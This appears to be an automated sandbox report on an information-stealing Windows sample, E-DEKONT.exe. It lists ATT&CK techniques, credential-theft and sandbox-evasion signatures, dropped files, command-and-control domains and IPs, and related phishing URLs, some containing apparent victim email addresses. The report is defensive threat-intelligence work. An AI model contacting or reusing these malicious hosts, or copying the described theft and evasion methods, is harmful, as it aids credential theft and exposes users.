                  Masquerading                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common11
                  Virtualization/Sandbox Evasion                  		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                  Process Injection                  		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755881 Sample: E-DEKONT.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 34 dbxo1.shop 2->34 36 aapancart.com 2->36 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 3 other signatures 2->48 9 E-DEKONT.exe 2 33 2->9         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 9->24 dropped 50 Self deletion via cmd or bat file 9->50 52 Tries to detect Any.run 9->52 13 E-DEKONT.exe 63 9->13         started        signatures6 process7 dnsIp8 38 dbxo1.shop 104.21.44.194, 49852, 49859, 80 CLOUDFLARENETUS United States 13->38 40 aapancart.com 103.14.99.114, 443, 49851 TRUNKOZ-INTrunkozTechnologiesPvtLtdIN Singapore 13->40 26 C:\Users\user\AppData\...\vcruntime140.dll, PE32 13->26 dropped 28 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 13->28 dropped 30 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 13->30 dropped 32 45 other files (none is malicious) 13->32 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->54 56 Tries to steal Instant Messenger accounts or passwords 13->56 58 Tries to steal Mail credentials (via file / registry access) 13->58 60 6 other signatures 13->60 18 cmd.exe 1 13->18         started        file9 signatures10 process11 process12 20 conhost.exe 18->20         started        22 timeout.exe 1 18->22         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  E-DEKONT.exe26%VirustotalBrowse
                  E-DEKONT.exe21%ReversingLabsWin32.Trojan.Nemesis

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\mozglue.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\msvcp140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\nss3.dll4%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\ucrtbase.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\75C649CD\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  aapancart.com2%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://dbxo1.shop/db1/index.phpl0%Avira URL Cloudsafe
                  http://dbxo1.shop/0%Avira URL Cloudsafe
                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
                  http://dbxo1.shop/db1/index.phpM0%Avira URL Cloudsafe
                  http://dbxo1.shop/db1/index.php0%Avira URL Cloudsafe
                  http://ocsp.thawte.com00%Avira URL Cloudsafe
                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
                  http://www.mozilla.com00%Avira URL Cloudsafe
                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
                  http://dbxo1.shop/db1/index.php~0%Avira URL Cloudsafe
                  http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
                  https://aapancart.com/DOHx0%Avira URL Cloudsafe
                  http://dbxo1.shop/db1/index.phpe0%Avira URL Cloudsafe
                  https://aapancart.com/qO0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  aapancart.com
                  		103.14.99.114
                  		truefalseunknown
                  dbxo1.shop
                  		104.21.44.194
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://dbxo1.shop/db1/index.phptrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.mozilla.com/en-US/blocklist/mozglue.dll.4.drfalse
                      		high
                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdE-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://dbxo1.shop/db1/index.phplE-DEKONT.exe, 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://dbxo1.shop/db1/index.phpME-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.thawte.com/ThawteTimestampingCA.crl0E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://dbxo1.shop/E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.thawte.com0E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mozilla.com0E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdE-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nsis.sf.net/NSIS_ErrorErrorE-DEKONT.exefalse
                          		high
                          http://dbxo1.shop/db1/index.php~E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDE-DEKONT.exe, 00000004.00000001.108602358770.0000000000626000.00000008.00000001.01000000.00000005.sdmpfalse
                            		high
                            http://www.gopher.ftp://ftp.E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://dbxo1.shop/db1/index.phpeE-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aapancart.com/DOHxE-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aapancart.com/qOE-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            103.14.99.114
                            		aapancart.comSingapore
                            		58641TRUNKOZ-INTrunkozTechnologiesPvtLtdINfalse
                            104.21.44.194
                            		dbxo1.shopUnited States
                            		13335CLOUDFLARENETUStrue

                            General Information

                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:755881
                            Start date and time:2022-11-29 09:17:55 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:E-DEKONT.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 36.6% (good quality ratio 36%)
                            • Quality average: 87%
                            • Quality standard deviation: 21.2%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 60
                            • Number of non-executed functions: 55
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                            • Excluded IPs from analysis (whitelisted): 40.126.31.71, 40.126.31.69, 20.190.159.71, 20.190.159.75, 20.190.159.4, 20.190.159.23, 20.190.159.64, 40.126.31.67, 51.124.57.242
                            • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, tile-service.weather.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            103.14.99.114Swift Mesaj#U0131#09971.exeGet hashmaliciousBrowse
                              E-DEKONT.exeGet hashmaliciousBrowse
                                SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exeGet hashmaliciousBrowse
                                  104.21.44.194E-DEKONT.exeGet hashmaliciousBrowse
                                  • dbxo1.shop/db1/index.php
                                  SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exeGet hashmaliciousBrowse
                                  • dbxo1.shop/db1/index.php

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  dbxo1.shopSwift Mesaj#U0131#09971.exeGet hashmaliciousBrowse
                                  • 172.67.203.65
                                  E-DEKONT.exeGet hashmaliciousBrowse
                                  • 104.21.44.194
                                  SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exeGet hashmaliciousBrowse
                                  • 104.21.44.194
                                  aapancart.comSwift Mesaj#U0131#09971.exeGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  E-DEKONT.exeGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exeGet hashmaliciousBrowse
                                  • 103.14.99.114

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  CLOUDFLARENETUSSecuriteInfo.com.Win32.PWSX-gen.16062.16220.exeGet hashmaliciousBrowse
                                  • 104.18.115.97
                                  policy handbooks.htmlGet hashmaliciousBrowse
                                  • 104.17.24.14
                                  https://sites.google.com/view/uas-invite/homeGet hashmaliciousBrowse
                                  • 104.16.126.175
                                  darden.com .htmlGet hashmaliciousBrowse
                                  • 104.17.25.14
                                  https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.comGet hashmaliciousBrowse
                                  • 104.18.100.194
                                  darden.com .htmlGet hashmaliciousBrowse
                                  • 104.18.11.207
                                  Message.htmlGet hashmaliciousBrowse
                                  • 104.17.24.14
                                  https://linktfetn.ccGet hashmaliciousBrowse
                                  • 104.22.54.104
                                  https://ipfs.fleek.co/ipfs/bafybeic3q6fuhi5kyycepznhhccvbdkt36zuhk6qn4hh2vwyqpoa2r3kqa#nbbebenefits@crystalco.comGet hashmaliciousBrowse
                                  • 104.18.10.207
                                  https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9Get hashmaliciousBrowse
                                  • 104.21.72.10
                                  https://linkprotect.cudasvc.com/url?a=https%3a%2f%2flnewmanbunnellelectric.com%2f&c=E,1,-SmOrItRkzmIjK3rKUS4lI02RvsfWzGdZ1HnCIT5Pt230osjD6mDrVCNiu4teQwo-lwx2RA8Bs1QUO7XeVgh7bu1527soTNm0HME39Y1hPc-NQmLQw,,&typo=1Get hashmaliciousBrowse
                                  • 104.17.25.14
                                  http://nbtp3.commentlikeordislike.com/aHR0cHM6Ly9mb3Vyc3RhcmFsYW4uY29tL3N1Y2Nlc3MvZ28vZ2FicmllbGEubWFydGluQHNreWFpcmxpbmUuY29tGet hashmaliciousBrowse
                                  • 104.17.25.14
                                  ATT00001.htmGet hashmaliciousBrowse
                                  • 104.18.7.145
                                  #U266b Audio-1410.wavv-Copy.hTmGet hashmaliciousBrowse
                                  • 104.17.24.14
                                  FCA000200010005.PDF.exeGet hashmaliciousBrowse
                                  • 104.21.51.185
                                  Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                  • 104.17.24.14
                                  https://mailsrver.contributes.rest/databases.html?home=sculver@glenergy.comGet hashmaliciousBrowse
                                  • 104.21.20.237
                                  IMG_2022028022-0120.vbsGet hashmaliciousBrowse
                                  • 172.67.169.218
                                  45FRI 36545.htmGet hashmaliciousBrowse
                                  • 104.18.11.207
